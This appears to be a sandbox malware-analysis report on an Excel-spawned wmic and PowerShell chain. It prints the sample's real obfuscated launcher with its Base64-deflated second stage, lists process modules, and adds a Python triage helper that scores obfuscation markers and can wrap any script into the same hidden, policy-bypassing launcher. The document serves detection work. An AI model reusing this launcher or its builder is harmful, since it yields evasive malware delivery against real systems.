lO1r41y55Rslsw7Wq9ml+QGJ4zH4Ag+dl2qnXgH+sUOqvE3ETyN/7M2MSOwW/StZEwESwbJEUckbf8yGyIgJR78HbGCxVzsYKeObVDu9AajvN6bjcNpwvuKZ+3k0k2vci4SdE8TfkliMyDcCq2fBYKsJfvSjzj2ks3C4UyU1RHC+zL0HRRb316QwmtWuWXmfxQbFa2bwj0YHawEOYkGmkrLJFsZxApnmDcxm0SqWdMNE2+4uDiBSOEAGZnU40ajr1R3mBmdv1kh/oa
Cli2MvU8xH4oN7aWldc4FGOYe42fTlQtpnLUxD4MoNtMuuo7q+QsSueGHR5LhLT9JsLoS3HNtmiq+AI+GvLslwtptg6Gl+DNJDJckuJE68hsFLXWFuLmlTFbcLhkvYUC6TVsAjoWGwLpgTSGV10OAZIVhxO1YWlPFsELHaRUatjYWTfBgQG97aMrkRGzDz2YLa7TNirezlxqo9QHpFxJPV8QpbSiatLSwVbGz4uTQnKo6h+JtGzQcT03YnY2cF/IK4rKTPrsZcI7aU10xWeUPbNREokxZGzUVgeWrIUCus3asQQH7uSWxPWbPVZ2PxgYpfUe5VkMtou0vxFitpSxwq3Y0W26dvKoyZAFHYh72cZA2wH5WBGyVECp9HFPBQeEoZ6DS+EUWP5n62TvqlVAk/cgUYJmX1FdnPVGmGhts3rpmRKmm470fR07a3KwfWFJWtmEB+zz8DRKzxZxxMGmX/i+G7vTY7K9vAQk5fXVwkOpyYytaFfcRoBvNQDLOaT65IhEDGHiQbJvEqLPN3+wDhKcjeg0X1pT1ZeBm8KxJZfxdqBGN4Xmyxq83+kCwAmlTfYzfMw1SVPeD6C+jwhVDQIAAxAS3eQbLMR0XLTFg11Fuuoy4rsTWfb5SmNwKEpoVWjkcvZnRiF/lHJq49LHeH9ro1bxs0eHoOQSyeWaL/NxJ+wXy8lw5bJgnJgF9lrmdSRnWNDji9vqM9MjOki3AaacXl5D5+wXZFyr3peQ6kAvdtjNknoznGKkQWIjkMN36kCflumxxWGTxJkh02Wi5RGea5701Sbul2zG+1AX6NbSDfeRelT6UHMYqvyVaJFlplsEqCekzrwCRnLSqL0vl6u5HLyHMheWw6bVUUd11s+YQNIsylDng8MYTm0z7tnHL5OinJEcZr6pGSew+AZBwHBbkCiIIdk234/2nyXetWOu7HU9zySNKSAZYdNTsH+urGgvYy3nu6bZNFyuSG5VVnEV+h61uZUnbAzzTGCR3omkZyZiOlVRHqEAa7+MtlK1UuDLYPhjBVtzSwgAiISN5UpDpQ8zaJ9VOZpX9MAxtEWdwK5uOy/KltqCIvrZwOh+r3O843JB3IX63L76G7yo9FYLEFE2tk8mFa6efTI+MSeYTqlyjw7nyqs60cm9KSdaBuVQBXKuI/GD+zh4XEnaYB0CeJi443bq8nzzJApY22MpmjGsXF6ZjxnWB+tLlyozs/pBo02slI2CIQvd2aSTQ2IvsWOgyV9dRvY7QP6wTPqfDwlpyRUKitxKbo0ydeFcNho/5gLW9U/nO0ujVxpgiFuc3KbHOJM/hZY0/LYVtYo2VyECMegEiuWZss6QcLv5QBdCgY2cZveBD0nLdGgxaupHZ99xCOVs66VRQIm44Up8g4piXNFKMoyb1AK28PH56FOZeaV0zLHVYSk0ZGdd+eNmQIvKrtVHkwc5g/4iKpNxk99UPDVOKBh3xJn13BbFtaA/XY9PVtBiGVsD10N+fl7NmLpazlgR+AJCOgUDxmYOIjsfLIT37JxtnSio73nhJykXKOby4321j9nYy1C8tLMqNQyUW+a7LXI/Gt4c11osN0PWceaGBKtyrNO5+GUYqPq8cmlOctURSlR9XqyBemYsv5wqJ9mDBCy2ZnUloTMy95UlsCSMnf5bCaYqRq1KQEOkertIlZYtfLoVCC5ojvGNGOUkIO5SxCe4sQjnDy9y6LpM41BKdV+jBC4FL1eG3ACSfaQQmlXZtxqbzNqrIW/yn8NMZCOHOFiGn36BGEUhp8RnsqdqniE1ZWaXdbVEtuOm/WYTpgqcbf7MJUz7IK1yZoKaQBNlmfuhAdxirmSqzdQ5uk50O5wVzH5ElHXVVIQaM8MsyLLyuTLNzUWdnmE6BiaAUxpbEoTHTZkAmNfRyCYJcgk1EmHXvbA3j+cQXkE4g3HYmgxAnn8tUTA9ntoMIYPHlWvPm5Z/Wqc8OfQPphjdXZkvmExSYzz1PVrJKE8gI+cs9wdFtkPE
plMW20KLUIJYotbzZw42u15WZgzcnr0lU+oWct91R1einJ6ZdyL8lAKRYAdHRsJ3qKTqy1MV91qp0Sk/Orhgp1owy6MCd9O8VKl17haEjY08c+LBAvpbM9tJadbi5Y7pVfkVJHbNnvmwRJ9OUDLKHInWdktzmtbv5a0VjJ9r0vb1kdanrjEq0FTlSxWOfrmPhjpqxVQzv0xBRJpWeuqwFgPqd5UJjhzVVUB7ZqbZwvuqF9LxoXNC0SXHJnZcVxuHzC2SeZc0rSd5FPzYCnsvKRtTksmsLHvlIPJlAth8KRdSrw5CKfSxYMuhkdeZPtyfOBhqdBd1F4fGZFOzpsEDuVIHBWTj3JHjadGfvIxCobxCDacnsOozEzvwN/twwwfT294EJacRMPd21Ld7VpbMxhq46IkPsYdTlhaVDD5ai3nJdgryrtNt0Yo2U2bkihq3AQpwlF7zFcMa7+1bZWcmIdfHpvL5ydO0wgXVaroIJJQNypgKwGwu2Ti537NGqReUPTCQj4mhLzznUPCgLhnJqJn4WQlPwuU6yW3ybuWtI6piUV3+JxkQK9Y1XDY7HCbWxMxmuBtXdDBKRlWQUutDkwKb7bNVkZ3DmWx01bVvH1RIlxTzzLNQfWoV+OR55RdG2WbYWsyU40vlTdSZdSG40loFpFt5fEQ3MSoXjR3q6kVs4nW3J/mGKj8+wPZ/YQPfWdwHKNqqfE9zcC4z0ByKV2T5IrhW9XNk2L0hB5dnuV5NYApCWbTAuAcSb3ZcpzbqWY9YqlPkfJQ2o0ZEPXYu0SAdTzNBuvwSYhLbVmtyIBKX9K7RQppzg2ezD96HoJtkE20PblH9dNS22lkkiuFOKpVji90ozPFPdP+hG3IwVlHLnfduOAhTz3amorpfR5BUJ1UeFWzaqU8t3XqPKT5zN22fDtK+uNmSQo60Ker8Boi4bzE5wHT26Wfu/J8MmHmmtm0Lzkr/Nlpp7qQRd69DaGjWBIIhermbuoMxGwewhB1egax0GSu7ME9OXZvwwbA8XPyP+tFljg5BIzppqMbOY0nU3z1u/hcwqBnS8na6pb7oSNW2/m4xis4xpMw1L0Vp9SQU5Y9LIBbhhiqUg9qU0Cn+TwAWJuPZBO2mR58POAhyHZTO1NfKrNcPouzrHpL9jpmMac9US/I1+hTukO4olKPqE53m57EeyWf5FMdFgeqFZClETypfW2+x6xHsW7OIRU/5zfycSw9hzYKdwlreTbSCaccCE/Lz3oWPMHJWSraC3ROfFs+zHjljDYfaV1uIFK9zUKbWSCf1IgssNMS7SXo3V9b6uokay0SbsiTqodF+MPP7IqqLzdkMB/Dh3H5CO29IaDH1GHlLdqkGKJfkBXJyHyuGt694apf1H0hv2094Vqe7OxVZt8+Vyy/Hc+bLvqqHuLmM9ztDF57VY8ed7EofQwHU/P7nc95vx4msahcVNwun4cf+v4odFY2sbORFOH/MbdpzXXlcp4dvZ7gTjTzQ6N0pDDSzK21AYoXQTX5mHA8n+1H1JkC8ddKQVTZ3N6k6ZslOUiZ4j7p8nHUOUg18iwrPUYxGsFtJ5ftFy3Mo/UT7nY74MlHl9HPDTSrYRqHmM/uX3LDyhJCqD3kX3Gr1b7+73/88Nff//Z3f/jbX/7tj7//92/lf8qXP/3uD7/98af7vx/+8t9//uu3n7777p9/+Pn7b21/+fI3//p33375p28//vyXf/jytXy9/r58/fr1/8r969f/Bw==' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX
Path
C:\WINDOWS\System32\WindowsPowerShell\v1.0\POWeRsHEll.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\combase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\gpapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\uxtheme.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\windowsbase\8604bd365c35cb553eff5fc8fd67fd19\windowsbase.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\presentationcore\62b9468240b1680a41ae0b06684c40d5\presentationcore.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\presentatio5ae0f00f#\3eca476a270a2cb119f487c890810379\presentationframework.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xaml\753248c2082aaa25ba3f3b64f8f24362\system.xaml.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml.linq\b59428c2a855f7044b339e8206043346\system.xml.linq.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\microsoft.net\assembly\gac_64\microsoft.visualbasic.activities.compiler\v4.0_10.0.0.0__b03f5f7f11d50a3a\microsoft.visualbasic.activities.compiler.dll
c:\windows\system32\msvcp120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\microsoft.v9921e851#\94a3f05ae4dab0ff71443505d0ee300b\microsoft.visualbasic.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.enterpriseservices\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.enterpriseservices.dll
c:\windows\microsoft.net\assembly\gac_64\system.enterpriseservices\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.enterpriseservices.wrapper.dll
c:\windows\system32\ntmarta.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.runteb92aa12#\509b15a107dedcf707e7cd6e17e061cd\system.runtime.serialization.ni.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrcompression.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
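
The chain recorded above is EXCEL.EXE launching wmic.exe with 'process call create', and WMI in turn starting the obfuscated PowerShell (PID 2504). The report lists no parent for that PowerShell because processes created through Win32_Process.Create are spawned by the WMI provider host rather than by wmic.exe, which breaks the Office-to-PowerShell parent-child link that many detections key on. The launcher itself assembles 'sal' (Set-Alias) and 'iEx' from format-operator fragments so neither cmdlet name appears literally, passes -WiN 00000000000000000000001 (which PowerShell parses as the integer 1, i.e. WindowStyle Hidden), and decodes its second stage as Base64 -> DeflateStream -> UTF-8 text -> Invoke-Expression. The Python below is an added triage helper, not part of the ANY.RUN report or of the sample: it reproduces that decode chain (raw DEFLATE, so zlib needs wbits=-15) and scores a command line against the obfuscation markers visible on this page. The marker list and the threshold of four hits are the author's tuning choices, and the second-stage text it round-trips is constructed; the real second stage is not reproduced.

```python
"""Triage helper for the wmic -> powershell launcher captured in this report.

Added example: this is not part of the ANY.RUN report or of the sample.
It reproduces the decode chain the captured command line performs
(Base64 -> raw Deflate -> UTF-8 text -> Invoke-Expression, minus the
execution step) and scores a command line for the obfuscation markers
visible on the page. The second-stage text round-tripped below is
constructed; the real second stage is not reproduced here.
"""
import base64
import re
import zlib
from typing import Optional

# Launcher text as captured on the page (PID 5800), with the Base64 blob
# elided as '...'. Kept verbatim so the marker patterns are exercised
# against real, randomised-case input.
REPORT_LAUNCHER_EXCERPT = r"""wMIc 'pRoCEss' 'CALL' "cREate" "POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '...' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX"""

# Constructed second stage used for the round trip (not the sample's payload).
CONSTRUCTED_STAGE2 = "Write-Output 'constructed second stage; not the real payload'"

# Patterns derived from the captured command lines. Matching is
# case-insensitive because the launcher randomises letter case
# (POWeRsHEll, frOmBaSe64StrIng, ...) to defeat exact-string matching.
MARKERS = {
    "wmi_process_create": r"\bwmic\b.{0,40}\bprocess\b.{0,10}\bcall\b.{0,10}\bcreate\b",
    "exec_policy_bypass": r"-e(?:xecutionpolicy|p)\s+bypass\b",
    # -WindowStyle takes the enum's integer; 00000000000000000000001 parses as 1 = Hidden.
    "hidden_window": r"-win(?:dowstyle)?\s+(?:0*1|hidden)\b",
    "no_profile": r"-nop(?:rof(?:ile)?)?\b",
    "non_interactive": r"-noninterac(?:tive)?\b",
    # "{0}{1}" -f 's','al' assembles 'sal' (Set-Alias) without the literal cmdlet name.
    "alias_via_format_op": r"-f\s*'s'.{0,16}'al'",
    "base64_decode": r"frombase64string",
    "deflate_stream": r"deflatestream",
    "invoke_expression": r"\biex\b|invoke-expression",
}

BLOB_RE = re.compile(r"frombase64string\(\s*'([A-Za-z0-9+/=\s]+)'\s*\)", re.IGNORECASE)


def match_markers(cmdline: str) -> list:
    """Names of the obfuscation markers present in a process command line."""
    flags = re.IGNORECASE | re.DOTALL
    return [name for name, pat in MARKERS.items() if re.search(pat, cmdline, flags)]


def decode_stage(cmdline: str) -> Optional[str]:
    """Recover the second-stage script, or None if no decodable blob is present.

    .NET's DeflateStream is raw DEFLATE (RFC 1951) with no zlib header, so
    zlib must be told wbits=-15; a plain zlib.decompress() fails on it.
    """
    m = BLOB_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)
        return zlib.decompress(raw, -15).decode("utf-8")
    except (ValueError, zlib.error):  # binascii.Error is a ValueError
        return None


def triage(cmdline: str, threshold: int = 4) -> dict:
    """Score one command line; the threshold is a tuning choice, not a standard."""
    hits = match_markers(cmdline)
    return {"markers": hits, "suspicious": len(hits) >= threshold,
            "stage2": decode_stage(cmdline)}


def build_launcher(script: str) -> str:
    """Wrap `script` the way the captured launcher does (constructed sample).

    Compression is raw DEFLATE so the blob is what
    [IO.Compression.DeflateStream]::Decompress on the PowerShell side would accept.
    """
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    deflated = comp.compress(script.encode("utf-8")) + comp.flush()
    blob = base64.b64encode(deflated).decode("ascii")
    return REPORT_LAUNCHER_EXCERPT.replace("'...'", "'" + blob + "'")


if __name__ == "__main__":
    for label, cmd in (("constructed", build_launcher(CONSTRUCTED_STAGE2)),
                       ("report", REPORT_LAUNCHER_EXCERPT)):
        result = triage(cmd)
        print(label, "suspicious" if result["suspicious"] else "clean", result["markers"])
        print("  stage2:", result["stage2"])
```

Run against the excerpt from this report, every marker fires but the second stage comes back as None, because the blob is elided on the page; run against the constructed launcher, the round trip returns the embedded script. For a live triage, paste the full Base64 string from PID 2504's command line into the frOmBaSe64StrIng( '...' ) slot and read the decoded text instead of executing it; the wbits=-15 detail is the part most often missed when the decode is attempted with a zlib-header-expecting tool.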

PID
5540
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\dwmapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll
c:\windows\system32\textinputframework.dll
c:\windows\system32\coreuicomponents.dll
c:\windows\system32\coremessaging.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wintypes.dll
c:\windows\system32\clbcatq.dll

PID
1924
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll

PID
3848
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
